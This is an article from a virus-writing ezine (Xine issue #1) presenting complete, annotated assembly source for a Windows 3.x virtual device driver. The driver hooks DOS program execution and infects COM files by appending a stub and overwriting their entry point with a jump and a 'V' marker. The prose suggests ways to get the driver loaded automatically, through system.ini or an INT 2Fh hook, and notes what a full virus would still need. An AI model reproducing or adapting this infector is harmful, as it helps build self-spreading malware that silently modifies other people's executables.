
xine-1.006


  


/-----------------------------\
| Xine - issue #1 - Phile 006 |
\-----------------------------/

JHB presents:

infections by VxD

Well yes, just as TSRs are to DOS, VxDs are to Windows: they offer an
amazing power, and most probably 90 percent will never know a VxD has been
added. This example shows how a VxD can modify COM files and do it fast.
To make a true virus you would need to add a method to get the VxD into
memory. Infecting a command file and hooking int 2F, you can watch
and wait till Windows yells out "hey, look out, I am loading"; at this time
you can make the VxD tell Windows to load it. Another way I feel may be easier
is to modify the system.ini to load it. But those are other bridges to
cross...


;well lets be honest I used a source code as a frame to build this
;example, I did make the int 21 hook and the other stuff but that's
;just modified virus ideas from regular dos virii.
;to test just add the line in the system.ini in the
;[386Enh]
;device=vvmd.386
;oh yea you need the masm5.1 and the device driver kit for windows3.X
;to assemble this; if any one finds another way to assemble this please
;let me know.
;
;************************************************************************
TITLE VVD.ASM - Virtual Virus Device
;
;
;problem: if ifshlp is loaded in the config.sys, windows
;refuses to load; no error, it just returns to the c:\. Only happens on one
;system, not sure why
;
;************************************************************************

.386p


;************************************************************************
; I N C L U D E S
;************************************************************************

.XLIST
INCLUDE VMM.Inc
.LIST

;************************************************************************
; V I R T U A L D E V I C E D E C L A R A T I O N
;************************************************************************

; Device name VVD, version 3.0, control procedure VVD_Control, device ID
; TSRLoad_Device_ID, no fixed initialization order; the two trailing empty
; arguments are the V86-API and PM-API entry points, which this VxD does
; not provide.
Declare_Virtual_Device VVD, 3, 0, VVD_Control, TSRLoad_Device_ID, \
Undefined_Init_Order, ,


;************************************************************************
; I N I T I A L I Z A T I O N D A T A
;************************************************************************

VxD_DATA_SEG

pFn dd ? ; flat linear address of the EXEC file name (computed in int_21handler, not read again in this file)
VVD_RW_BUFF db 32h dup (0) ; 50-byte scratch buffer; not referenced by the code shown here
SysFile db "WIN.COM" ; name that is never modified; int_21handler compares the target's basename against it
db 9 dup (0)
SysFileLen dw 8 ; compare length: "WIN.COM" plus its NUL, so only an exact basename matches

hFILE DW ? ; DOS handle of the file int_21handler has open (used again for the close)

NEW_JMP DB 0E9H ; 4 bytes written over offsets 0-3 of the target: JMP rel16 ...
Fsize DW ? ; ... displacement = original size - 3, i.e. to the appended V_HOST stub
MARKER DB "V" ; lands at file offset 3; int_21handler tests this byte to recognise already-modified files

V_HOST db 0c7h, 06, 00, 01 ;MOV WORD PTR [100], -- 16-byte stub appended at the original end of file
FIRST_WORD DW ? ; immediate = original bytes 0-1, filled in by int_21handler before the write
DB 0C7H, 06, 02, 01 ;MOV WORD PTR [102],
SECOND_WORD DW ? ; immediate = original bytes 2-3
DB 068H, 00, 01 ;PUSH 0100
DB 0C3H ;RET -- PUSH/RET transfers control to 100h, the restored original entry
SIZE_V DW 0010H ; length of V_HOST (10h); int_21handler uses the literal 10H rather than this word
VxD_DATA_ENDS

;************************************************************************
; R E A L M O D E I N I T I A L I Z A T I O N
;************************************************************************

VxD_REAL_INIT_SEG

BeginProc VVD_Real_Mode_Init
;-----------------------------------------------------------------------
; Real-mode initialization entry point.
; Out:  AX = Device_Load_Ok (continue loading)
;       BX = 0, SI = 0 (nothing to exclude, no instance data)
; Nothing is checked here; the loader is simply told to proceed.
;-----------------------------------------------------------------------
        mov     ax, Device_Load_Ok      ; report "load me"
        xor     bx, bx                  ; no page-exclusion list
        xor     si, si                  ; no instance data items
        ret
EndProc VVD_Real_Mode_Init

VxD_REAL_INIT_ENDS

;*************************************************************************
; D E V I C E C O N T R O L P R O C E D U R E
;*************************************************************************

VxD_CODE_SEG

BeginProc VVD_Control
;-----------------------------------------------------------------------
; Device control procedure.
; In:   EAX = system control message
; Out:  CF clear for every message this VxD does not handle
; The two Control_Dispatch entries are independent compare-and-jump
; tests, so their order does not matter.
;-----------------------------------------------------------------------
        Control_Dispatch Init_Complete, VVD_Init_Complete
        Control_Dispatch Device_Init,   VVD_Device_Init

        clc                             ; unknown message: report success
        ret
EndProc VVD_Control

VxD_CODE_ENDS


;*************************************************************************
; I N I T I A L I Z A T I O N C O D E
;*************************************************************************

VxD_ICODE_SEG

BeginProc VVD_Device_Init
;-----------------------------------------------------------------------
; Device_Init handler: installs int_21handler in the V86 INT 21h hook
; chain, so every DOS call issued from a VM reaches it first.
; Out:  CF clear (the result of Hook_V86_Int_Chain itself is not examined)
;-----------------------------------------------------------------------
        mov     esi, OFFSET32 int_21handler   ; ESI = hook procedure
        mov     eax, 21h                      ; EAX = interrupt to hook
        VMMcall Hook_V86_Int_Chain

        clc
        ret
EndProc VVD_Device_Init

BeginProc VVD_Init_Complete
;-----------------------------------------------------------------------
; Init_Complete handler: nothing to do at this stage.
; Out:  CF clear (success)
;-----------------------------------------------------------------------
        clc
        ret
EndProc VVD_Init_Complete

VxD_ICODE_ENDS

VxD_CODE_SEG

;*************************************************************************
; V86 I N T E R R U P T H A N D L E R S
;*************************************************************************

;*************************************************************************
;
; int_21handler
;
; DESCRIPTION: Attempts to determine if the file is a COM file; if so,
; adds a marker at the end.
; Past that point the COM file is modified to
; jmp to the end, then returns after restoring the host
;
;
;=========================================================================
;NOTE: IT APPEARS THAT ON ENTRY TO HERE EBP -> THE CRS (REGS STRUCTURE)
;WHILE EBX -> THE VM HANDLE
;NOT SURE IF EBX IS A POINTER, BUT I AM ASSUMING IT IS AT THIS TIME
;TO MAKE LIFE EASIER
;SEEMS MY GUESS IS WRONG
;
;The system calls the procedure as follows:
;
; mov eax, Interrupt ; number of interrupt hooked
; mov ebx, VM ; current VM handle
; mov ebp, OFFSET32 crs ; points to a Client_Reg_Struc
; call [HookProc]



BeginProc int_21handler
; V86 INT 21h hook (installed by VVD_Device_Init via Hook_V86_Int_Chain).
; In:   EAX = 21h, EBX = current VM handle, EBP -> Client_Reg_Struc
; Out:  CF set on every path (REFLECT_21), so the interrupt always
;       continues down the chain to the next hook / the V86 handler.
; Only AX = 4B00h (EXEC) is looked at; every other DOS call passes through.
; Register roles: EDX / [pFn] = flat address of the client's file name,
;       EDI = cursor in that name, EBX (from file_open on) = DOS file handle.
cmp [ebp.Client_AX],4b00h ;the exec call (AH=4Bh load, AL=00h load-and-execute)
jne REFLECT_21 ;anything else: pass it on untouched


Push_Client_State ;save the client register image (restored by Pop_Client_State at EXIT_I21)
VMMcall Begin_Nest_Exec ;enter nested execution so the VxDint 21h calls below run in the client VM

movzx edx, [ebp.Client_DS] ; get offset to file name: linear = (DS << 4) + DX ...
shl edx, 4
movzx eax, [ebp.Client_DX]
add edx, eax
add edx, [ebx.CB_High_Linear] ; ... plus the VM's high-linear base -> flat address the VxD can read
mov [pFn], edx ; kept in pFn (not read again here); the code below works from EDX

; if win.com do not infect
push edi
mov edi, edx ; file name
mov ecx, 128 ; scan at most 128 bytes for the terminating NUL
mov al, 0
repne scasb
dec edi ; EDI -> the NUL (or the last byte scanned if none was found)

i21_90: dec edi ; walk backwards to the last path separator
cmp byte ptr [edi], '\'
je short i21_100
cmp byte ptr [edi], '/'
je short i21_100
cmp byte ptr [edi], ':'
je short i21_100
cmp edi, edx ; stop once we have stepped in front of the first byte
jb short i21_100
jmp short i21_90

i21_100: inc edi ; see if they match: EDI -> basename (byte after the separator, or start of string)
mov esi, offset32 [SysFile]
movzx ecx, [SysFileLen] ; 8 bytes = "WIN.COM" plus its NUL, so only an exact basename matches
repe cmpsb
pop edi
jz EXIT_I21 ; win.com do not play with (POP does not touch the flags left by CMPSB)

mov eax, 3D22h ; open file: AH=3Dh, AL=22h = read/write access, deny-write sharing
VxDint 21h
jnc file_open
jmp EXIT_I21 ; error on open

file_open:
MOV word ptr [hFile],AX ;YEA OLD SAVE FILE (DOS handle, reused for the close below)
MOV EBX,EAX ;HANDLE (EBX no longer holds the VM handle from here on)

mov eax, 3F00h ; read MZ: AH=3Fh, 2 bytes at offset 0 into FIRST_WORD
mov ecx, 2 ;assume if not MZ
lea edx, FIRST_WORD ;its a com file
VxDint 21h ;
jc EXIT_I21 ; read error: leaves via EXIT_I21, i.e. without the close at close_EXIT_I21
cmp word ptr [FIRST_WORD], 5A4Dh ; "MZ" signature -> EXE, leave it alone
je close_EXIT_I21 ;

mov eax, 3F00h ; read next two bytes (file offsets 2-3) into SECOND_WORD
mov ecx, 2 ;assume if not MZ
lea edx, SECOND_WORD ;its a com file
VxDint 21h ;
jc EXIT_I21 ; read error: same as above, no close
cmp BYTE ptr [SECOND_WORD+1],"V" ; offset 3 == MARKER means this file was already modified
je close_EXIT_I21 ; (FIRST_WORD/SECOND_WORD now also hold the original bytes 0-3 inside V_HOST)



mov eax, 4202h ; seek to end: AH=42h, AL=02h (from EOF), CX:DX = 0 -> DX:AX = file size
xor ecx, ecx
mov edx, ecx
VxDint 21h
jc close_EXIT_I21

CMP DX,0 ;FILE IS TOO BIG (DX != 0 means size >= 64K, out of reach of a 16-bit JMP)
JNE close_EXIT_I21 ;GET OUT OF HERE

DEC EAX ;adjust the file size
DEC EAX ;for the jmp: rel16 = size - 3, since the JMP at offset 0 is 3 bytes long
DEC EAX ;
MOV [Fsize],AX ;SAVE THE FILE_SIZE (becomes the displacement inside NEW_JMP)

MOV EAX,4000H ;WRITE THE V_HOST: AH=40h, 10h bytes appended at EOF (file pointer is still at EOF)
MOV ECX, 10H ;
lea EDX, V_HOST ;
VxDint 21h ; CF from this write is not checked

mov eax, 4200h ; seek to start: AL=00h (from beginning), offset 0
xor ecx, ecx
mov edx, ecx
VxDint 21h
jc close_EXIT_I21


MOV EAX,4000H ;WRITE THE 4 bytes E9 <Fsize> 'V' over file offsets 0-3
MOV ECX, 4 ;NEW JMP
lea EDX, NEW_JMP ;
VxDint 21h ; CF from this write is not checked either


close_EXIT_I21:

mov bx, [hFile] ; close file: BX = handle saved at file_open
mov eax, 3E00h ; AH=3Eh close
VxDint 21h




EXIT_I21:
VMMcall End_Nest_Exec ;leave nested execution (pairs with Begin_Nest_Exec above)
Pop_Client_State ;RESTORES THE CLIENT REGS saved by Push_Client_State




REFLECT_21: ;reflect interrupt to next VxD or to V86 handler
stc ; CF set = not consumed; the VMM passes the interrupt down the chain
ret

EndProc int_21handler

VxD_CODE_ENDS


END VVD_Real_Mode_Init
